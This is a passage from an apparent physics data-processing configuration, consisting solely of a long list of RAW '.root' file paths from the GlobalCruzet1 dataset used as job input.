'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EC3BB1E-C01C-DD11-B657-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFC81C8-D01C-DD11-BC93-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/2EFCB33C-C61C-DD11-9BDE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30085D93-CC1C-DD11-95BF-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/300A34D7-B91C-DD11-B8B8-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30184FA3-CE1C-DD11-B135-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3022C499-CC1C-DD11-A9F3-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/306C0F0C-C01C-DD11-8997-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30AFFEA2-CE1C-DD11-9650-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B25C8A-CC1C-DD11-8F44-000423D9880C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/30B4DC4C-C41C-DD11-8D66-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32074B83-CA1C-DD11-A8A0-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3279A90D-C01C-DD11-9288-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3288778F-CA1C-DD11-A8F8-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32D57812-C21C-DD11-80A8-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/32E8D78D-CA1C-DD11-9B0C-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/342BF7D5-D21C-DD11-B3A7-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34AA2ED9-D21C-DD11-9434-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34B5B163-C41C-DD11-AB48-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/34CA75D1-B91C-DD11-B4FD-000423D98930.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36191416-C21C-DD11-8A6C-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/362838EC-BD1C-DD11-B8C7-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3636B1D0-BB1C-DD11-806E-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/366827C8-D01C-DD11-A7E9-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/36F3E11D-C21C-DD11-A1AF-001617E30D52.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38032FF8-BF1C-DD11-BC36-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/383986EC-BB1C-DD11-987A-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38935E7E-CA1C-DD11-88E5-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FBE115-C01C-DD11-A373-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/38FEBD81-CA1C-DD11-8C28-000423D98804.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A207592-CA1C-DD11-9F1B-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3A914003-BE1C-DD11-B42F-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AC9A6A1-CC1C-DD11-9962-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3AD17346-C61C-DD11-B4D1-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CA07EFF-BD1C-DD11-A85D-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3CC33988-CA1C-DD11-A9EC-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/3EA0B2D0-BB1C-DD11-A7F7-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/404FC1CE-D01C-DD11-84F5-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42A7E9D1-B91C-DD11-96A0-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/42E5A594-CA1C-DD11-8E72-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4403FC5C-C81C-DD11-8187-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/44200AB3-CE1C-DD11-981F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/460369CC-D01C-DD11-9907-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46285A63-C41C-DD11-8F4C-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4671328A-CC1C-DD11-9B21-001617E30D38.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46E219D1-B91C-DD11-AE70-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/46FBF8CE-D21C-DD11-A2EA-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48541196-CA1C-DD11-9E90-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/485816A4-CC1C-DD11-A10D-000423D98AF0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4872EE1D-C01C-DD11-A5FD-000423D98C20.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4885B4F9-BF1C-DD11-89B7-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/48F3F2A2-CE1C-DD11-8DD4-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A06FFA1-CC1C-DD11-87A2-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4A9CB82A-C21C-DD11-AEE7-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AD639F8-BB1C-DD11-AF29-000423D944F8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4AFDEF53-C41C-DD11-A04C-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4C0DF65E-C41C-DD11-9D7F-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4CB55298-CC1C-DD11-A393-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E3E253C-C61C-DD11-B716-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4E55CAD7-B91C-DD11-9856-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EA7B5F5-BD1C-DD11-892C-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EB6F2E2-BB1C-DD11-B989-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EBAD914-C21C-DD11-9C60-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/4EE090E8-BB1C-DD11-BC09-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/500D4FD2-D01C-DD11-939D-001617DBD332.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5094F75E-C41C-DD11-B213-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/50F25166-C81C-DD11-85F3-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5226D48D-CA1C-DD11-A560-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/529811ED-BB1C-DD11-B009-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5410534C-C41C-DD11-B43A-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54770146-C41C-DD11-9790-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/549CC491-CC1C-DD11-8EB2-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54EC00E7-BD1C-DD11-86E8-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5613B8D3-D21C-DD11-A49D-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/564941D8-D21C-DD11-B75D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/580242EB-BD1C-DD11-B34E-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5807F882-CA1C-DD11-B19D-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5819A263-C41C-DD11-B93A-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5856C70C-BE1C-DD11-90DF-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFC591-CC1C-DD11-9D51-001617C3B6C6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFCDE8-BD1C-DD11-924A-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58C248C6-D01C-DD11-B059-0019DB29C620.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A00E33C-C61C-DD11-B95A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A22A0B4-CE1C-DD11-A7BD-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5AB6A96D-C81C-DD11-9224-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5ABCF4EA-BD1C-DD11-BEC4-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C00E13C-C61C-DD11-BC62-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C029908-BE1C-DD11-8D92-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C8FF55E-C41C-DD11-A1B7-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EC8D0EF-BD1C-DD11-AF64-001617C3B5E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EDD9A34-C21C-DD11-83C7-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EE95EF0-BD1C-DD11-8A21-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/625095C3-D01C-DD11-9A3D-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62BB3764-C81C-DD11-BBD3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62D3B406-BE1C-DD11-A3C3-000423D94AA8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62E3211E-C01C-DD11-93FE-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/666DBCE5-BB1C-DD11-8798-000423D94AA8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/66F8A946-C41C-DD11-92FC-000423D98DB4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/68773EEE-BB1C-DD11-BABD-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A2E651E-C01C-DD11-84C1-000423D94990.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A44B7C8-D01C-DD11-8F4F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A6DB7F0-BB1C-DD11-9956-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6CCACD33-C21C-DD11-A4E2-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6E894A32-C21C-DD11-AD3B-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/703CC249-C41C-DD11-B7EE-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7042ABF9-BB1C-DD11-99CB-000423D996B4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/70929317-C01C-DD11-8762-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/72014426-C21C-DD11-AC2E-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7442701B-C21C-DD11-B0D4-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/74E7AFF1-BB1C-DD11-BDEE-000423D944FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/760CE253-C41C-DD11-9431-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/763379F4-BF1C-DD11-B9FF-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7647D092-CA1C-DD11-922E-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/766816D6-BB1C-DD11-BC35-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/769F4256-C41C-DD11-858D-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76AEBDBF-D01C-DD11-A47D-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76C8B52A-C21C-DD11-BF56-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B3F914-C01C-DD11-B45B-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B871C3-D01C-DD11-AE14-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78D879C3-D01C-DD11-AB54-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7AA262D0-B91C-DD11-9AE8-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C5A8EDE-BB1C-DD11-8883-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C91A4D1-D01C-DD11-9C38-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CA38092-CC1C-DD11-B3CD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CBF8F21-C21C-DD11-AE6F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CCAEC8D-CA1C-DD11-ACE0-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CD95E12-C01C-DD11-946F-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CF8CCB7-CE1C-DD11-BBC5-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7E88CB00-BE1C-DD11-A4F2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/807685B9-CE1C-DD11-BDE9-001617DBD316.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/821564AD-CE1C-DD11-935B-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/827CD5E5-BD1C-DD11-8A9D-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/82E4352D-C21C-DD11-A609-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8408B7F0-BB1C-DD11-8737-000423D98930.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8434B0D0-BB1C-DD11-B3FF-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B26D4E-C41C-DD11-A476-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B564D5-BB1C-DD11-8DAC-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86BB41EB-BD1C-DD11-AC05-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88C52BD1-B91C-DD11-9018-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88E8E765-C81C-DD11-B9F5-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8A50CFD5-BB1C-DD11-A5AC-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8ADC3A47-C61C-DD11-8B91-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C313DA9-CE1C-DD11-886B-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5B3009-C01C-DD11-9CBD-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5EEA19-C01C-DD11-87DB-000423D98AF0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CDE12B8-CE1C-DD11-B016-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CF25D88-CC1C-DD11-87AC-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8E7CCBC9-B91C-DD11-9DC7-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EAAD7EF-BD1C-DD11-87A9-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EB94A9D-CA1C-DD11-BD37-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9002413D-C61C-DD11-8F13-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/904500F6-BF1C-DD11-A72B-000423D6B358.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90650142-C61C-DD11-9D29-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/906666A6-CE1C-DD11-8150-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90C564AD-CE1C-DD11-8CB2-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90D4F325-C21C-DD11-8AE2-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/927D4BCC-B91C-DD11-901B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9436CC91-CC1C-DD11-AAD9-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/94DF6FBE-D01C-DD11-AF80-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9623B3D8-D21C-DD11-87DF-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96C5EF49-C41C-DD11-924D-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96FA9F95-CA1C-DD11-B4F2-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9897F7DF-BB1C-DD11-9A1B-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A03A402-C01C-DD11-8445-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3AAC06-BE1C-DD11-ABCE-001617C3B654.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3F7F01-BE1C-DD11-9163-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9AECBFAD-CE1C-DD11-8024-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CD29BC2-B91C-DD11-AA74-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CE491F4-BB1C-DD11-99D6-000423D98750.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E0AB00E-C01C-DD11-B975-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E3A7467-C81C-DD11-8ED6-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EEA60D4-B91C-DD11-A2CC-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EF3B958-C41C-DD11-B6DA-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A039DFF6-BD1C-DD11-B92E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A054B619-C21C-DD11-B913-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A0E92059-C41C-DD11-A68C-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2287EA3-CC1C-DD11-9191-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A22A0AA2-CC1C-DD11-B64A-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A24F3E0A-C01C-DD11-9FBB-001617C3B6C6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A298BAC8-B91C-DD11-B235-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2C47E4E-C61C-DD11-9003-001617C3B6CE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4412EE2-BD1C-DD11-91AD-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A441E958-C81C-DD11-87EF-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A45B800F-C01C-DD11-A4C3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4743792-CC1C-DD11-8FF3-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4956AC1-D01C-DD11-831E-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4C86A24-C21C-DD11-A311-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A600E0DA-BB1C-DD11-A3FA-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A6C9CEAB-CE1C-DD11-9068-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A83BF12B-C21C-DD11-BA3F-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85100F9-BB1C-DD11-8610-000423D9989E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85B574E-C41C-DD11-9727-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A89BB268-C81C-DD11-B973-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A8B4ACF4-BF1C-DD11-B38C-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA0830DB-D21C-DD11-8065-000423D6CA42.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA22C202-BE1C-DD11-9FB5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AAC9C441-C61C-DD11-8BD3-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/ACA9E015-C21C-DD11-BA35-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE02DC53-C41C-DD11-8FE6-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE0D0D54-C41C-DD11-9BB8-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE240861-C81C-DD11-80B8-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE6999EC-BB1C-DD11-8866-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE7136CC-B91C-DD11-9831-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE86A9B9-D01C-DD11-A29D-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE8F9A49-C41C-DD11-8B66-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B009918A-CA1C-DD11-982D-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B016F7FB-BD1C-DD11-B8B6-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B01F2516-C21C-DD11-8FC3-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02481F5-BD1C-DD11-8A72-001617E30D4A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02B64D6-BB1C-DD11-A3CE-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B051A8FB-BD1C-DD11-B7AB-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0683BFC-BD1C-DD11-B043-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B09FBB45-C21C-DD11-B2EE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0A93C4F-C41C-DD11-8736-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B2B62AB9-D01C-DD11-B55B-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B41E2C53-C61C-DD11-A94F-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B438131A-C21C-DD11-B626-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4517446-C61C-DD11-ACBC-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4779F8A-CC1C-DD11-BFB1-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4CF580D-C01C-DD11-8B5D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B612C72A-C21C-DD11-BD75-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B67DD69E-CE1C-DD11-8F69-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B6897EC8-B91C-DD11-BD5F-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B80F3696-CA1C-DD11-BD90-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81950D8-D21C-DD11-B36F-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81B443A-C61C-DD11-A800-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B83C61F5-BD1C-DD11-B5FD-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B8599355-C81C-DD11-A68F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA002BE5-BB1C-DD11-A279-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA48FBA7-CC1C-DD11-BA37-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA68A5D2-B91C-DD11-8939-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAB7A2F5-BD1C-DD11-8CE7-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAFBE4CF-D01C-DD11-AD5D-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC03A04C-C61C-DD11-B6C6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC58B4B7-CE1C-DD11-B473-0016177CA7A0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE3C2165-C41C-DD11-BCB1-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE708B20-C01C-DD11-9862-000423D98BC4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEA65F0C-C01C-DD11-983A-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEB2F75E-C41C-DD11-A2D1-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C015805E-C81C-DD11-AF4A-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C02B2DE2-BD1C-DD11-A5FD-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2053F88-CA1C-DD11-890F-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C26F6CB5-CE1C-DD11-A748-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2A2F3D3-D21C-DD11-B7BE-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2BFF2E5-BD1C-DD11-93D1-001617E30D40.root',
